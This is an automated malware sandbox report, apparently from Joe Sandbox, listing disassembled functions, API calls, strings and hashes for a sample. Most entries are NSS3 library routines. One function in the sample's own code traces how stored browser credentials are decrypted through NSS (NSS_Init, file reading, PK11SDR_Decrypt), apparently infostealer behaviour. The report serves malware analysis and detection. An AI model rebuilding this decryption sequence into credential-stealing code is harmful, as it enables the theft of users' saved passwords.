String ID:
API String ID: 759471828-0
Opcode ID: 45018589d35af9be94f2f2bc36bd9717e9968c5002626ddf883ede2fc3c87970
Instruction ID: 7231dcd1738f3a9895ab59da9c1f51d06b539aeaf18697d3aef64d3e5b4eb20e
Opcode Fuzzy Hash: 45018589d35af9be94f2f2bc36bd9717e9968c5002626ddf883ede2fc3c87970
Instruction Fuzzy Hash: 83B1F075A00206EFDB00EF69DC84AAA77B4BF49318F044564ED2697B01EB31ED64CBD2

Function 6C5E6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C5E6BF7), ref: 6C5E6EB6

Part of subcall function 6C541240: TlsGetValue.KERNEL32(00000040,?,6C54116C,NSPR_LOG_MODULES), ref: 6C541267
Part of subcall function 6C541240: EnterCriticalSection.KERNEL32(?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C54127C
Part of subcall function 6C541240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C541291
Part of subcall function 6C541240: PR_Unlock.NSS3(?,?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C5412A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C68FC0A,6C5E6BF7), ref: 6C5E6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5E6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C5E6EFC
PR_NewLock.NSS3 ref: 6C5E6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C5E6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C5E6BF7), ref: 6C5E6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C5E6BF7), ref: 6C5E6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C5E6BF7), ref: 6C5E6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C5E6BF7), ref: 6C5E6FFD

Strings

SSLFORCELOCKS, xrefs: 6C5E6F2B
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C5E6FDB
SSLKEYLOGFILE, xrefs: 6C5E6EB1
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C5E6F4F
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C5E6FF8
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C5E6EF7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 3998354deadb4a2f0b43a7b3318cb22fa0372dcff57da862c3a1df37ab658f07
Instruction ID: 41382b0ecce3a44419a999702f1a0f3d64de8282e0180b46765c5fdf58edd31d
Opcode Fuzzy Hash: 3998354deadb4a2f0b43a7b3318cb22fa0372dcff57da862c3a1df37ab658f07
Instruction Fuzzy Hash: 6EA18BB2B59E9187E740863DCD4034436E2AB8F3A9F184765E931C7EDADB31D450874D

Function 017EC130 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 017EC142

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013C0650,00000000,?,017FEC9C,00000000,?,?), ref: 017EC206
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 017EC223
GetFileSize.KERNEL32(00000000,00000000), ref: 017EC22F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 017EC242

Part of subcall function 017F6800: malloc.MSVCRT ref: 017F6808

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 017EC272
StrStrA.SHLWAPI(?,013C07A0,017FE56F), ref: 017EC290
StrStrA.SHLWAPI(00000000,013C06F8), ref: 017EC2B7
StrStrA.SHLWAPI(?,013C0D28,00000000,?,017FECA8,00000000,?,00000000,00000000,?,013BE7F8,00000000,?,017FECA4,00000000,?), ref: 017EC435
StrStrA.SHLWAPI(00000000,013C0B68), ref: 017EC44C

Part of subcall function 017EBFC0: memset.MSVCRT ref: 017EBFF3
Part of subcall function 017EBFC0: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,013BE7D8), ref: 017EC011
Part of subcall function 017EBFC0: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 017EC01C
Part of subcall function 017EBFC0: PK11_GetInternalKeySlot.NSS3 ref: 017EC02A
Part of subcall function 017EBFC0: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 017EC045
Part of subcall function 017EBFC0: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 017EC08B
Part of subcall function 017EBFC0: memcpy.MSVCRT ref: 017EC0B2
Part of subcall function 017EBFC0: PK11_FreeSlot.NSS3(?), ref: 017EC101

StrStrA.SHLWAPI(?,013C0B68,00000000,?,017FECAC,00000000,?,00000000,013BE7D8), ref: 017EC4ED
StrStrA.SHLWAPI(00000000,013BE768), ref: 017EC504

Part of subcall function 017EBFC0: lstrcat.KERNEL32(?,017FE51F), ref: 017EC0E3
Part of subcall function 017EBFC0: lstrcat.KERNEL32(?,017FE562), ref: 017EC0F7
Part of subcall function 017EBFC0: lstrcat.KERNEL32(?,017FE563), ref: 017EC118

lstrlen.KERNEL32(00000000), ref: 017EC5D7
CloseHandle.KERNEL32(00000000), ref: 017EC629
NSS_Shutdown.NSS3 ref: 017EC637

Strings

, xrefs: 017EC163

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: e9611393c34d9bd46012122b1431603aab3d8fcc222fdda7b3612fd558d22385
Instruction ID: bb3e44901b736bb7403db9f4e1e3f6ad6be2e351618ddb6a30a3afd0377f400e
Opcode Fuzzy Hash: e9611393c34d9bd46012122b1431603aab3d8fcc222fdda7b3612fd558d22385
Instruction Fuzzy Hash: 3FE1BB75910109ABCF15EFA4DC99FEFB778AF24300F10415DE206A6299EF306A46CF66

Function 6C5BE8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C5BE853,?,FFFFFFFF,?,?,6C5BB0CC,?,6C5BB4A0,?,00000000), ref: 6C5BE8D9

Part of subcall function 6C5B0D30: calloc.MOZGLUE ref: 6C5B0D50
Part of subcall function 6C5B0D30: TlsGetValue.KERNEL32 ref: 6C5B0D6D

Part of subcall function 6C5BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C5BDAE2,?), ref: 6C5BC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C5BE972
PORT_ArenaMark_Util.NSS3(?), ref: 6C5BE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5BEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C5BEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C5BEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C5BEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C5BEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C5BEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C5BEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C5BEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C5BEBEC
free.MOZGLUE(00000000), ref: 6C5BEC58

Strings

S[l, xrefs: 6C5BE9CA, 6C5BEAAB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: S[l
API String ID: 759478663-75501975
Opcode ID: cd2ea2044e0528f23ca77249d54706453ab2e619a32f6e518944c776aba4ba8c
Instruction ID: 2876fa21ee09d008b8d91b76d704c8daf6fd8dd2fb2a6afd8fd20171c0df0724
Opcode Fuzzy Hash: cd2ea2044e0528f23ca77249d54706453ab2e619a32f6e518944c776aba4ba8c
Instruction Fuzzy Hash: 57C17FB1E00205DBEB00CF69DC95BAA7BB4BF58308F1805A9E906B7B51E771E804CBD1

Function 6C584E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C584E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C584EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584EC7

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C584EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C584F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C584F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C584F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C584F68

Strings

pTemplate = 0x%p, xrefs: 6C584F4A
(CK_INVALID_HANDLE), xrefs: 6C584EC0, 6C584F13
C_GetAttributeValue, xrefs: 6C584E7E
hObject = 0x%x, xrefs: 6C584EF5, 6C584F05
ulCount = %d, xrefs: 6C584F63
hSession = 0x%x, xrefs: 6C584EA2, 6C584EB2
nfl, xrefs: 6C584F82, 6C584FB2

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nfl
API String ID: 1003633598-1330800382
Opcode ID: 4a600b8a20b7c777e7a15cf14ed5b6e47e2bf0a294481c0c970c52e95aaae3ab
Instruction ID: 557f253e6cb768bcdcfcbf04e39a7dcec5db337f72aa1601dfed1fe646f74495
Opcode Fuzzy Hash: 4a600b8a20b7c777e7a15cf14ed5b6e47e2bf0a294481c0c970c52e95aaae3ab
Instruction Fuzzy Hash: 7841F670602154AFDB00DF56DD88F9A77B9EF8230DF048428EA086BB51D7309D58CBAE

Function 6C584CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C584CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C584D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584D37

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C584D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C584D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C584D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C584DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C584DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C584E20

Strings

*pulSize = 0x%x, xrefs: 6C584E1B
C_GetObjectSize, xrefs: 6C584CEE
pulSize = 0x%p, xrefs: 6C584DB7
(CK_INVALID_HANDLE), xrefs: 6C584D30, 6C584D83
hObject = 0x%x, xrefs: 6C584D65, 6C584D75
hSession = 0x%x, xrefs: 6C584D12, 6C584D22
nfl, xrefs: 6C584DD4, 6C584DFF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nfl
API String ID: 1003633598-1513572855
Opcode ID: fe044d4049540c0caa3ba14a17164b0771803c6ecf02bac690e210cbbb127a6a
Instruction ID: 2778905a38d7ff2e34f0e83eb31592ca123590760aa3d003e244a17d253745a2
Opcode Fuzzy Hash: fe044d4049540c0caa3ba14a17164b0771803c6ecf02bac690e210cbbb127a6a
Instruction Fuzzy Hash: 1341C571602114EFD700DF16DDD8B6A77B9EB8230DF088425E9096BA52DB309D58CBAE

Function 6C582F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C582F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C582F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C582F63

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C582F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C582F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C582FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C582FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C582FE7

Strings

ulOldLen = %d, xrefs: 6C582FB0
pOldPin = 0x%p, xrefs: 6C582F95
(CK_INVALID_HANDLE), xrefs: 6C582F5C
pNewPin = 0x%p, xrefs: 6C582FC9
C_SetPIN, xrefs: 6C582F21
ulNewLen = %d, xrefs: 6C582FE2
hSession = 0x%x, xrefs: 6C582F3E, 6C582F4E
nfl, xrefs: 6C582FFF, 6C583030

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$nfl
API String ID: 1003633598-2808911704
Opcode ID: 280bb26d3792f18cb1dda1bfbe94d723c3a8d76e920a01b59aa6e11286d7b7cb
Instruction ID: c501599af3c2fc4b742881c229a37f088fec06d950dc3452e9e5b152b2f1c006
Opcode Fuzzy Hash: 280bb26d3792f18cb1dda1bfbe94d723c3a8d76e920a01b59aa6e11286d7b7cb
Instruction Fuzzy Hash: 3531E675602154EFDB00DF56DD8DE4A3BB2EB8631DF084424E9096BB51DB309868CBAE

Function 6C5E28C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5E5B56

TlsGetValue.KERNEL32 ref: 6C5E290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C5E291E
TlsGetValue.KERNEL32 ref: 6C5E2937
EnterCriticalSection.KERNEL32(00000001), ref: 6C5E294B
PR_EnterMonitor.NSS3(?), ref: 6C5E2966
PR_EnterMonitor.NSS3(?), ref: 6C5E29AC
PR_ExitMonitor.NSS3(?), ref: 6C5E29D1
PR_EnterMonitor.NSS3(?), ref: 6C5E29F0
PR_EnterMonitor.NSS3(?), ref: 6C5E2A15
PR_EnterMonitor.NSS3(?), ref: 6C5E2A37
PR_ExitMonitor.NSS3(?), ref: 6C5E2A61
PR_ExitMonitor.NSS3(?), ref: 6C5E2A78
PR_ExitMonitor.NSS3(?), ref: 6C5E2A8F
PR_ExitMonitor.NSS3(?), ref: 6C5E2AA6

Part of subcall function 6C619440: TlsGetValue.KERNEL32 ref: 6C61945B
Part of subcall function 6C619440: TlsGetValue.KERNEL32 ref: 6C619479
Part of subcall function 6C619440: EnterCriticalSection.KERNEL32 ref: 6C619495
Part of subcall function 6C619440: TlsGetValue.KERNEL32 ref: 6C6194E4
Part of subcall function 6C619440: TlsGetValue.KERNEL32 ref: 6C619532
Part of subcall function 6C619440: LeaveCriticalSection.KERNEL32 ref: 6C61955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C5E2AF9
free.MOZGLUE(?), ref: 6C5E2B16
PR_Unlock.NSS3(?), ref: 6C5E2B6D
PR_Unlock.NSS3(?), ref: 6C5E2B80

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: 40f6337c2d7353931d2033e842dc8de7d47ad7a69fd8c1819f7faf7d6ef4098b
Instruction ID: 2c45c848cd4c41a7c3d10f6f506193684f5966d5f6e9ca07b4ef4fe21efdb3cd
Opcode Fuzzy Hash: 40f6337c2d7353931d2033e842dc8de7d47ad7a69fd8c1819f7faf7d6ef4098b
Instruction Fuzzy Hash: 3781B5B1A007019BE720DF39EC45797B7E9AF59309F044928D85AC7B11EB32F518CB96

Function 6C5A8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8E9E
PORT_ArenaAlloc_Util.NSS3(6C6B0B64,00000001,?,?,?,?,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C5A8E01,00000000,6C5A9060,6C6B0B64), ref: 6C5A8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C5A8E01), ref: 6C5A8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6B0B64,6C6B0B64), ref: 6C5A8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C5A8F3F

Part of subcall function 6C5AA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C5AA421,00000000,00000000,6C5A9826), ref: 6C5AA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5A904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C5A8E76

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: b41e1f02d84fde6752975b71591dbcb59214a1205aefb68b604ffb098f8cb395
Instruction ID: a9def51d2a5c04b55ac8a6a30fe758c72614ba98d526294c90b72f1a7cdc36e3
Opcode Fuzzy Hash: b41e1f02d84fde6752975b71591dbcb59214a1205aefb68b604ffb098f8cb395
Instruction Fuzzy Hash: E2616FB5D001169BDB10CF97CC80AAFBBB5FF89358F144529DC18A7B40E732A916CBA5

Function 6C558E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C558E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C558E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C558EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6818D0,?), ref: 6C558F03
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C558F19
PL_FreeArenaPool.NSS3(?), ref: 6C558F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C558F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C558F65
PL_FinishArenaPool.NSS3(?), ref: 6C558FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C558FFE
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C559012
PL_FreeArenaPool.NSS3(?), ref: 6C559024
PL_FinishArenaPool.NSS3(?), ref: 6C55902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C55903E

Strings

security, xrefs: 6C558EE7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: a7826ea04b41c996860968badecf13e772fa709fb5893e277aaee1cd4c73ce37
Instruction ID: 8e7c6f35571ba291b94f312bf4554169f433c57ff43d5157f384e360e18c5e13
Opcode Fuzzy Hash: a7826ea04b41c996860968badecf13e772fa709fb5893e277aaee1cd4c73ce37
Instruction Fuzzy Hash: 435159B1648300ABD7109A559C81FAB77E8AFC675CF840C2FF455A7B40E732D8298767

